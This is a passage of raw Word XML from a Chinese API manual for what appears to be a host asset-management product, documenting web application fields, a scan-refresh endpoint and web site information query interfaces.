          <w:p w14:paraId="68AB18E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06E73EE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70649D06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="76A34027" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="251E036D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>webRoot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B762A7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F48D899" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38AA4198" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>站点根路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="714FC891" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FE1137F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28B5EEBE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6694AF63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="711943ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>站点类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5ABC5841" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CCE4B0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>domainName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31220C9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="024AA32E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0462BB69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="792BA870" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06928D6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pluginCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F482E4B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F24C6B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50E841A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>插件数</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5B56AFF3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AE9CBCC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="163C155F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A0CA333" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71DD8C27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2117497A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27A8D9D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13B8E6EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="377F7D7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30FE267D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="18FBEF71" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="156A8C6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rootPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33996FBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2060661A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D39AF04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>根路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23712620" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="141D845E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>plugins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B6BB41C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DE96538" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pluginName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">：varchar(512) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pluginUri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">：varchar(1024) description：varchar(1024) author：varchar(512) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>authorUri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：varchar(1024) version：</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DDD0762" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">插件信息列表 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pluginName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>插件名</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pluginUri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>插件官网链接</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> description：插件描述 author：作者 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>authorUri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：作者地址 version：版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46D06647" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc115166109"/>
      <w:bookmarkStart w:id="70" w:name="web应用信息扫描"/>
      <w:bookmarkEnd w:id="68"/>
      <w:r>
        <w:t>web应用信息扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="43F084AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求web应用信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1E438C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D12513E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/webapp/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win|linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C362E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB63EA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268DE3AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C647CC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/webapp/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2613ADB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFC3400" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7563BAC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E00D815"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516E603D"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tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="71D0534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26EF05C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4507B7FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="542A3216" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="698AE190" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6017AA1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06E58316" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DE29C17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FFC4EE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc115166110"/>
      <w:bookmarkStart w:id="72" w:name="web应用信息查询扫描状态"/>
      <w:bookmarkEnd w:id="70"/>
      <w:r>
        <w:t>web应用信息查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="5D6B6B26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询web应用信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFA8756" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc115166111"/>
      <w:bookmarkStart w:id="74" w:name="web站点信息"/>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="72"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Web站点信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="3226FC15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询web站点信息；每条数据均包含主机信息，您可以灵活的使用该接口组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA185A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B90165A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于查询资产中的web站点信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B6629E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF24534" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>web站点信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6555B4C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24043A4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513CEB1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2914CD9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>web站点信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E20F992" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>web站点信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72132157" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>web站点信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F2F57F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC102BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用web站点信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10932BA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FEB6CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB7D074" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc115166112"/>
      <w:bookmarkStart w:id="76" w:name="web站点信息查询结果"/>
      <w:r>
        <w:t>web站点信息查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="4CC4E741" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询web站点信息，按每台主机每个用户组进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E87EC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
